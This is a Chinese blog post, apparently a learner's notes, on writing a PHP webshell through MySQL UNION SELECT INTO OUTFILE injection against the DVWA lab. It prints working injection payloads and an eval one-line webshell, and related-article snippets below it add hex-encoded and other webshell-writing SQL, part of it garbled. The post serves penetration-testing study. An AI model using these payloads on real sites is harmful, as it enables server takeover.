SQL注入写入webshell的方法(union select写入)

最新推荐文章于 2024-05-13 13:39:50 发布
最新推荐文章于 2024-05-13 13:39:50 发布
阅读量1.2k 收藏 4
点赞数 1
分类专栏: sql注入 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/faclon666/article/details/129861618
版权

(菜鸟一枚,日常记录,写的不对的地方欢迎大家指正)

必备条件

想要成功向MySQL写入WebShell需要至少满足以下4个条件:

1) 数据库的当前用户为ROOT或拥有FILE权限;

2)知道网站目录的绝对路径;

3) PHP的GPC参数为off状态;

4) MySQL中的secure_file_priv参数不能为NULL状态。

以DVWA靶场low级别为例:


1.判断是否存在注入点:

1)输入不常见的大数无反应

2)猜测是根据参数id值来查询数据,尝试:

===》存在数字型注入点

 2.找到网站所在的绝对路径

1' union select 1,@@datadir #

 3.利用sql注入点写shell:

1' union select "<?php @eval($_GET['cmd'])?>","hello admin" into outfile 'F:\\phpstudy\\MySQL\\data\\shell.php' #

 4.写路径,验证是否成功。

NB:MySQL文件夹直接属于phpstudy目录,因此写路径时,不用把找到路径全写出来,就从phpstudy之后写就行。我就是就是犯了这个错误,试了半天死活没权限,结果根本路径就是写错了。

 5.使用蚁剑进行连接

问题:

我连接以后,其他操作,例如:文件管理。都显示{}。

不知道为什么,我以为是我把文件写在了MySQL底下,所以没用。但是在WWW目录下写也一样连接之后也没法操作其他。

解决:在没做其他改变的前提下,我ctrl+F5强制刷新了几回,就又行了。以下是文件管理、虚拟终端、浏览网页。

 

问题记录:

1.

 union 联合查询:

1.union 运算实际是合并两个结果集中的所有记录,将其中重复记录剔除(保证结果集中的记录唯一。)

2.nion运算的两个结果集必须具有完全的列数,并且各列具有相同的数据类型。

3.我觉得是UNION联合查询查询的东西里边有一个错并不影响其他的正确的输出结果。

知识补充链接:

(5条消息) 第四章 SQL查询之联合语句_联合查询_大脑经常闹风暴@小猿的博客-CSDN博客

(6条消息) MySQL内置函数_@@datadir_凳子啊凳子的博客-CSDN博客

白帽~无常
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
利用 SQL 注入修改目录权限
Kane 's Blog [A.D.K]
01-04 1873
注入拥有sa权限,提升webshell权限! Cacls显示或修改指定文件上的随机访问控制列表 (DACL)。语法cacls FileName [/t] [/e [/r User [...]]] [/c] [/g User:Permission] [/p User:Permission [...]] [/d User [...]]参数FileName 必需
mysql写shell
weixin_47385895的博客
08-22 1851
mysql常见写shell方法
SQL注入GetShell的方法(1)
forinput的博客
05-06 3452
SQL注入getshell的五中方式
MySQL注入写shell的条件
最新发布
huang0612123的博客
05-13 223
HVV面试
SQL注入webshell
柠檬i的博客
08-06 639
`INTO OUTFILE`是MySQL中用于将查询结果输出到文件的语法。它允许将查询结果写入到服务器文件系统中的指定文件。
SQL注入写入Webshell(Lines terminated by写入
faclon666的博客
03-31 685
在输出每条记录的结尾或开始处插入webshell内容,所以即使只查询一个字段也可以写入webshell内容。找到物理路径,但是这是个布尔注入,只返回真假。因为是同一网站,尝试使用上篇文章找到的物理路径来写入webshell。1.当mysql注入点为盲注或报错,Union select写入是不能利用的,那么可以通过分隔符写入SQLMAP的–os-shell命令,所采用的就是这种方式)页面仅显示有无用户,无其他报错信息,初步判断用布尔盲注。(菜鸟一枚,日常记录,写的不对的地方欢迎大家指正)
浅谈一次与sql注入 & webshell 的美丽“邂逅”
09-09
主要介绍了浅谈一次与sql注入 & webshell 的美丽“邂逅”,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
实战-从社工客服拿到密码登录后台加SQL注入绕过安全狗写入webshell到提权进内网漫游.pdf
03-21
本资源为一篇实战渗透测试笔记,记录了作者从社工客服拿到密码登录后台加 SQL 注入绕过安全狗写入 webshell 到提权进内网漫游的整个过程。 一、初探 作者首先尝试使用自制字典工具“御剑”扫描网站,但发现无法...
MSSQL 2005 LOG备份webshell方法
12-15
注:转载就注入出自’孤孤浪子博客’原创 http://itpro.blog.163.com 第一步 ...declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[ne
PHPCMS2008广告模板SQL注入漏洞修复
10-21
PHPCMS2008是一款流行的开源内容管理系统,然而,如标题所示,它存在一个广告模板SQL注入漏洞,这个问题在2008年的版本中尤为突出。SQL注入是一种常见的网络安全威胁,允许攻击者通过操纵输入数据来执行恶意SQL命令...
web漏洞 总结
YouthBelief的博客
10-10 998
小迪WEB一、SQL1.sql注入原理2.sql注入的种类3.SQL注入的绕过 (待补充)sql注入流程判断数据库类型的语句写入webshell的条件如果你在的目录没有执行权限怎么办?(待补充)sql注入的条件into outfile函数作用xp_cmdshell了解过哪些数据库的sql注入,怎么快速判断属于哪个数据库?时间延时的原理?sleep()不能用怎么办http头注入有了解吗?sql注入的防护方法order by 注入了解吗?二、使用步骤1.引入库2.读入数据 WEB 一、SQL 1.sql注入
sql注入写shell
jingxiaoxiong459的博客
08-01 301
id=-1' union select 1,2,0x3c3f706870206576616c2840245f524551554553545b785d293b3f203e into outfile 'D:\\phpstu\\phpstudy_pro\\WWW\\shell.php' --+ 尝试将一句话木马shell.php放入网站根目录。1.先将mysql.ini配置文件添加secure_file_priv = '',让secure_file_priv 不表示任何值。3.准备一句话木马<?
Mysql写入webshell两种方法总结-- into outfile,导入日志
qq_45730325的博客
05-19 3561
Mysql写入webshell
SQL注入之手工注入
2301_77778745的博客
04-25 176
但是,如果在这个条件后面添加“%”,例如“id=19 and 1=2%”,那么%将被视为模运算符,计算1对2取模的结果是1,因此这个条件将变为“id=19 and 1=1”,这个条件是正确的,整个语句的结果将为true。“id=19 and 1=2”是一段SQL语句,其中的“and”是逻辑操作符,意思是两个条件都必须满足。模运算返回两个数相除后的余数,例如10 % 3 的结果为1,因为3在10中可以整除3次,剩下1。--这时,使用逆推思路,从25开始往20推,第一个出现正确页面的数字即为正确的字段长度。
网络安全面试题-SQL注入问题总结
m0_60571990的博客
03-25 1547
网络安全面试题-SQL注入问题总结
MySQL注入写入WebShell的几种方式
热门推荐
04-16 2万+
在工具化日益成熟的今天,手工注入的能力越来越被忽视了。当你掌握了一款工具的使用时,应更深入的去了解工具帮你做了什么,把工具所产生的影响控制在自己可控的范围内。比如:当面对一个MySQL注...
如何通过SQL语句写入webshell
weixin_33720956的博客
07-03 1842
在web应用场景下,经常会碰到SQL注入场景,如页面能够执行SQL语句,那么可能会有直接通过SQL语句写入webshell的风险,常见的phpmyadmin环境下,通过几个语句可以轻松将一句话木马写入到服务器文件,如下: use test; //进入数据库create table test (shell text not null); //创建表insert into test (shell)...
WEBSHELL权限提升技巧(综合版)
蓝法典的专栏
08-19 3857
c: d: e:.....C:/Documents and Settings/All Users/「开始」菜单/程序/看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,
sql注入写入webshell
06-28
### 回答1: SQL注入是一种攻击技术,可以利用应用程序中存在的漏洞,将恶意的SQL代码注入到应用程序中,从而获取应用程序的控制权。如果攻击者成功地注入SQL代码,他们可以执行任意操作,包括写入WebshellWebshell是一种恶意代码,可以在受攻击的服务器上创建一个远程访问接口,允许攻击者执行任意命令。攻击者可以使用Webshell来窃取敏感数据、破坏系统、或者在服务器上安装其他恶意软件。 要利用SQL注入写入Webshell,攻击者需要找到一个易受攻击的应用程序,并利用应用程序中存在的漏洞注入恶意的SQL代码。一旦注入成功,攻击者可以使用SQL语句来创建一个Webshell文件,并将其写入服务器上的某个目录中。然后,攻击者可以使用Webshell来执行任意命令,包括上传和下载文件、执行系统命令、或者修改文件权限等操作。 为了防止SQL注入攻击,应用程序开发人员应该采取一系列措施,包括使用参数化查询、过滤用户输入、限制数据库用户的权限等。此外,管理员还应该定期检查服务器上的文件和目录,以确保没有Webshell存在。 ### 回答2: 什么是SQL注入SQL注入是一种攻击方式,用于通过对应用程序中的输入进行恶意注入,从而访问或与应用程序中的数据库进行交互。SQL注入通常利用应用程序的输入验证不严格,以及对数据库中的数据进行不安全的查询和处理,从而访问和操纵数据库。 什么是webshellWebshell是一种特殊的程序代码,可以通过Web接口进行访问和控制,可以给攻击者带来权限最高的系统操作权限。 如何通过SQL注入写入webshell? 攻击者通过SQL注入可以执行许多操作,包括获取或修改数据库中的数据,但更加危险的是可以通过写入webshell来获得对目标系统的完全控制。下面是一些通用的示例,介绍如何通过SQL注入外部攻击者写入webshell。 1. 通过UNICODE编码的方式写入webshell 攻击者可以通过在URL字符串中使用UNICODE编码来伪装恶意SQL注入代码,以此来避开Web应用程序的过滤器和安全防护措施。例如,攻击者可以使用以下语句,将webshell写入到一个包含BLOB类型的表中: ' UNION SELECT NULL, CAST(0x3C3F706870206576616C28245F5053545B312D31293B206966202869736572727065723F246F75745B315D290A7B2473797374656D3D2170737465725F6765745F636F6E74656E74735F75726C28293B2024746578743D2473797374656D5B31293B2073656E64286F62636F645B2272657175657374225D2E6"9"6"5"76616C285F504F53545B225F716"5"56"1"225D293B290A3F3E0A0A, NULL-- 此代码将webshell写入到一个表中,并通过使用PHP代码,能使其在服务器上运行。 2. 在注入点创建一个新表,并将webshell写入其中 攻击者可以通过多个SQL注入绕过过滤和检测,创建一个新的表并将webshell写入其中。例如,下面的代码可以被绕过,从而创建一个新的表: ' UNION SELECT NULL, 'CREATE TABLE webshell (id INT, shell text); INSERT INTO webshell(id, shell) VALUES (1,<?php eval($_POST[0]); ?>);' INTO OUTFILE '/var/www/html/new.txt'-- 此代码创建了一个新表“webshell”,其中包含列“id”和“shell”,并将webshell写入到以BLOB类型存储的“shell”列中。 3. 在目标服务器上创建一个外部表,并将webshell写入其中 攻击者还可以通过创建一个外部表,在连接到目标服务器时抓取webshell。例如,攻击者可以构建以下SQL语句以在目标服务器上创建名为“webshell”的外部表: CREATE TABLE webshell (id INT, shell text); INSERT INTO webshell(id, shell) VALUES (1, '<?php eval($_POST[0]); ?>'); 然后,攻击者可以请求一个可以对此表进行操作的URL: ' UNION SELECT NULL,'/var/www/html/?id=(SELECT GROUP_CONCAT(CONCAT(id,0x2C,shell),0x0A) FROM mysql.external_table WHERE table_name="webshell")' INTO OUTFILE '/var/www/html/output.txt'-- 该URL将在服务器上抓取webshell,并将其输出到/var/www/html/output.txt。攻击者现在可以从该位置获取完整的webshell,以便执行任意系统命令。 总结 SQL注入是一种令人不安的攻击方式,可以使黑客绕过应用程序的安全控制,从而访问和操纵系统中的数据。写入webshellSQL注入的最危险的结果之一,它允许黑客完全控制目标系统和数据。要保护Web应用程序免受SQL注入和其他攻击的威胁,建议采取一系列安全措施,包括在应用程序代码中实施更强大的输入验证和防御措施,利用Web应用程序防火墙和安全扫描器,以及升级和更新应用程序及其相关软件以减少漏洞和缺陷的风险。 ### 回答3: SQL注入是一种攻击技术,攻击者利用这种技术可以将恶意负载注入到应用程序的数据库中,包括写入webshell,从而获取系统控制权和敏感数据。SQL注入攻击是因为应用程序没有正确的验证用户输入数据而造成的。 SQL注入攻击者通过在应用程序的输入字段中输入特殊字符或语句,从而执行恶意SQL语句来覆盖或篡改应用程序的数据库。攻击者可以利用这个漏洞来写入webshell,从而获取远程访问到受害者的系统。 webshell是一种恶意软件,攻击者可以在受害者的主机上进行远程控制。攻击者可以利用webshell来窃取敏感信息、执行命令、上传或下载文件等操作。 攻击者通常会在注入恶意负载后,通过脚本或工具上传或执行webshell。一旦攻击者成功地写入webshell,他就可以通过浏览器或其他工具来远程控制受害者的系统。 为了防止SQL注入攻击,应用程序必须实施有效的数据验证和过滤,从而限制用户输入的字符和语句。此外,安装和更新防病毒和防火墙软件也是非常重要的。其他防御措施还包括使用安全套接字层(SSL)来加密数据传输,使用预编译语句来包含应用程序的数据查询,以及限制数据库用户的访问权限。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值